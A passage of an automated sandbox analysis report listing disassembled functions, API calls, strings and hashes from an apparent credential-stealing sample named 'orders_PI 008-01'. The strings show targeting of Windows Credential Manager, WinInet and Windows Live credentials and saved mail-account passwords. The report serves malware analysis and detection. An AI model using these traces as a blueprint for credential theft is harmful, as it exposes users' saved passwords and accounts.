                                        • _mbscat.MSVCRT ref: 0041014D
                                        • memset.MSVCRT ref: 00410129
                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                        • memset.MSVCRT ref: 00410171
                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                        • _mbscat.MSVCRT ref: 00410197
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                        • String ID: \systemroot
                                        • API String ID: 912701516-1821301763
                                        • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                        • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                        • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                        • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                        APIs
                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                        Strings
                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                        • API String ID: 1640410171-2022683286
                                        • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                        • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                        • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                        • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                        APIs
                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$strlen
                                        • String ID: -journal$-wal$immutable$nolock
                                        • API String ID: 2619041689-3408036318
                                        • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                        • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                        • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                        • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                        APIs
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,75570A60,?,00000000), ref: 00409C53
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,75570A60,?,00000000), ref: 00409C6F
                                        • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,75570A60), ref: 00409C97
                                        • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,75570A60), ref: 00409CB4
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D3D
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D47
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D7F
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                        • String ID: 0wE$`Wu$`Wu
                                        • API String ID: 2915808112-506312391
                                        • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                        • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                        • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                        • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$strlen
                                        • String ID:
                                        • API String ID: 667451143-3916222277
                                        • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                        • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                        • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                        • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                        APIs
                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                        • wcslen.MSVCRT ref: 0040874A
                                        • wcsncmp.MSVCRT ref: 00408794
                                        • memset.MSVCRT ref: 0040882A
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                        • wcschr.MSVCRT ref: 0040889F
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID: J$Microsoft_WinInet
                                        • API String ID: 3318079752-260894208
                                        • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                        • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                        • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                        • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                        APIs
                                        • LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                        • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                        • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                        • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                        APIs
                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                        • strlen.MSVCRT ref: 00406CCC
                                        • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                        • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                        • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2881943006-572158859
                                        • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                        • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                        • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                        • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                        APIs
                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 888011440-2039793938
                                        • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                        • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                        • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                        • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                        APIs
                                        Strings
                                        • too many attached databases - max %d, xrefs: 0042E951
                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                        • database is already attached, xrefs: 0042EA97
                                        • database %s is already in use, xrefs: 0042E9CE
                                        • unable to open database: %s, xrefs: 0042EBD6
                                        • out of memory, xrefs: 0042EBEF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                        • API String ID: 1297977491-2001300268
                                        • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                        • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                        • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                        • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                        APIs
                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                        • strchr.MSVCRT ref: 0040327B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringstrchr
                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                        • API String ID: 1348940319-1729847305
                                        • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                        • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                        • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                        • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                        • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                        • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                        • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00405E80
                                        • GetWindow.USER32(?,00000005), ref: 00405E98
                                        • GetWindow.USER32(00000000), ref: 00405E9B
                                          • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                          • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                        • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                        • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                        • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                        • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                        • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                        • SetFocus.USER32(00000000), ref: 00405EF3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Item$Rect$ClientFocusPoints
                                        • String ID:
                                        • API String ID: 2432066023-0
                                        • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                        • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                        • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                        • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                        APIs
                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                        • memset.MSVCRT ref: 0040FA1E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                        • String ID: WindowsLive:name=*$windowslive:name=
                                        • API String ID: 945165440-3589380929
                                        • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                        • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                        • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                        • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                        APIs
                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                          • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                          • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                        • strchr.MSVCRT ref: 0040371F
                                        • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                        • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                        • strlen.MSVCRT ref: 00403778
                                        • sprintf.MSVCRT ref: 0040379C
                                        • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                        • String ID: %s@gmail.com
                                        • API String ID: 3261640601-4097000612
                                        • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                        • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                        • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                        • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                        APIs
                                        • memset.MSVCRT ref: 004094C8
                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                        • memset.MSVCRT ref: 0040950C
                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                        • _strcmpi.MSVCRT ref: 00409531
                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                        • String ID: sysdatetimepick32
                                        • API String ID: 3411445237-4169760276
                                        • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                        • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                        • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                        • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                        • EndDialog.USER32(?,00000002), ref: 00405A96
                                        • EndDialog.USER32(?,00000001), ref: 00405AA9
                                          • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                          • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                          • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                        Memory Dump Source
